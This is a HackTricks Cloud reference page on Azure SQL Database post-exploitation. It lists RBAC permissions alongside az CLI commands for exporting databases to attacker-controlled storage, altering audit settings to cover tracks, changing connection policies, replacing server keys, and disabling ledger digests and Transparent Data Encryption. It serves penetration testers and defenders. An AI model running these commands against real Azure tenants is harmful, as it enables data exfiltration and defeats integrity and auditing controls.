Az - SQL Database Post Exploitation

Reading time: 6 minutes

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

SQL Database Post Exploitation

For more information about SQL Database check:

Az - SQL

`Microsoft.Sql/servers/databases/read`, `Microsoft.Sql/servers/read` && `Microsoft.Sql/servers/databases/write`

With these permissions, an attacker can create and update databases within the compromised environment. This post-exploitation activity could allow an attacker to add malicious data, modify database configurations, or insert backdoors for further persistence, potentially disrupting operations or enabling additional malicious actions.

bash

# Create Database
az sql db create --resource-group <resource-group> --server <server-name> --name <new-database-name>

# Update Database
az sql db update --resource-group <resource-group> --server <server-name> --name <database-name> --max-size <max-size-in-bytes>

With this permissions (Microsoft.Sql/servers/read && Microsoft.Sql/servers/databases/write) you can restore a deleted database:

bash

az sql db restore \
  --dest-name <new_database_name> \
  --name <original_database_name> \
  --resource-group <resource_group> \
  --server <server_name> \
  --deleted-time "<deleted_time_ISO_format>"

`Microsoft.Sql/servers/elasticPools/write` && `Microsoft.Sql/servers/elasticPools/read`

With these permissions, an attacker can create and update elasticPools within the compromised environment. This post-exploitation activity could allow an attacker to add malicious data, modify database configurations, or insert backdoors for further persistence, potentially disrupting operations or enabling additional malicious actions.

bash

# Create Elastic Pool
az sql elastic-pool create \
    --name <new-elastic-pool-name> \
    --server <server-name> \
    --resource-group <resource-group> \
    --edition <edition> \
    --dtu <dtu-value>

# Update Elastic Pool
az sql elastic-pool update \
    --name <elastic-pool-name> \
    --server <server-name> \
    --resource-group <resource-group> \
    --dtu <new-dtu-value> \
    --tags <key=value>

`Microsoft.Sql/servers/auditingSettings/read` && `Microsoft.Sql/servers/auditingSettings/write`

With this permission, you can modify or enable auditing settings on an Azure SQL Server. This could allow an attacker or authorized user to manipulate audit configurations, potentially covering tracks or redirecting audit logs to a location under their control. This can hinder security monitoring or enable it to keep track of the actions. NOTE: To enable auditing for an Azure SQL Server using Blob Storage, you must attach a storage account where the audit logs can be saved.

bash

az sql server audit-policy update \
  --server <server_name> \
  --resource-group <resource_group_name> \
  --state Enabled \
  --storage-account <storage_account_name> \
  --retention-days 7

`Microsoft.Sql/locations/connectionPoliciesAzureAsyncOperation/read`, `Microsoft.Sql/servers/connectionPolicies/read` && `Microsoft.Sql/servers/connectionPolicies/write`

With this permission, you can modify the connection policies of an Azure SQL Server. This capability can be exploited to enable or change server-level connection settings

bash

az sql server connection-policy update \
  --server <server_name> \
  --resource-group <resource_group_name> \
  --connection-type <Proxy|Redirect|Default>

`Microsoft.Sql/servers/databases/export/action`

With this permission, you can export a database from an Azure SQL Server to a storage account. An attacker or authorized user with this permission can exfiltrate sensitive data from the database by exporting it to a location they control, posing a significant data breach risk. It is important to know the storage key to be able to perform this.

bash

az sql db export \
  --server <server_name> \
  --resource-group <resource_group_name> \
  --name <database_name> \
  --storage-uri <storage_blob_uri> \
  --storage-key-type SharedAccessKey \
  --admin-user <admin_username> \
  --admin-password <admin_password>

`Microsoft.Sql/servers/databases/import/action`

With this permission, you can import a database into an Azure SQL Server. An attacker or authorized user with this permission can potentially upload malicious or manipulated databases. This can lead to gaining control over sensitive data or by embedding harmful scripts or triggers within the imported database. Additionaly you can import it to your own server in azure. Note: The server must allow Azure services and resources to access the server.

bash

az sql db import --admin-user <admin-user> \
--admin-password <admin-password> \
--name <target-database-name> \
--server <azure-sql-server-name> \
--resource-group <resource-group-name> \
--storage-key-type SharedAccessKey \
--storage-key <storage-account-key> \
--storage-uri `https://<storage-account-name>.blob.core.windows.net/bacpac-container/MyDatabase.bacpac`

`Microsoft.Sql/servers/connectionPolicies/write` && `Microsoft.Sql/servers/connectionPolicies/read`

With this permissions, a user can modify and retrieve the connection policies of an Azure SQL server. These permissions allow someone to change how clients connect to the server—choosing between methods like redirect or proxy—which could be exploited to weaken security, redirect traffic, or intercept sensitive data if misconfigured.

bash

az sql server conn-policy update \
  --resource-group <resource_group> \
  --server <server_name> \
  --connection-policy <policy>

`Microsoft.Sql/servers/keys/write` && `Microsoft.Sql/servers/keys/read`

With this permissions, a user can update and retrieve encryption keys associated with an Azure SQL Server. These keys are often used for securing sensitive data through encryption, so manipulating them could compromise data security by allowing unauthorized decryption or key rotation changes.

bash

az sql server key create \
  --resource-group MyResourceGroup \
  --server MyServer \
  --kid "https://mykeyvault.vault.azure.net/keys/mykey/1234567890abcdef

`Microsoft.Sql/servers/databases/ledgerDigestUploads/disable/action`, `Microsoft.Sql/locations/ledgerDigestUploadsAzureAsyncOperation/read`, `Microsoft.Sql/locations/ledgerDigestUploadsOperationResults/read`

This permissions permission allows disabling Ledger Digest for an Azure SQL Database, which stops the periodic uploading of cryptographic digest records to Azure Blob Storage that verifies the integrity of data.

bash

az sql db ledger-digest-uploads disable \
  --name ledgerDB \
  --resource-group myResourceGroup \
  --server my-sql-server

`Microsoft.Sql/servers/databases/transparentDataEncryption/write`, `Microsoft.Sql/locations/transparentDataEncryptionAzureAsyncOperation/read`, `Microsoft.Sql/servers/databases/transparentDataEncryption/read`

This permission allows an authorized user or attacker to enable, disable, or modify Transparent Data Encryption (TDE) settings on an Azure SQL database, potentially impacting data security by altering encryption configurations.

bash

az sql db tde set \
  --database <database-name> \
  --resource-group <resource-group-name> \
  --server <server-name> \
  --status <Enabled|Disabled>

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

HackTricks Cloud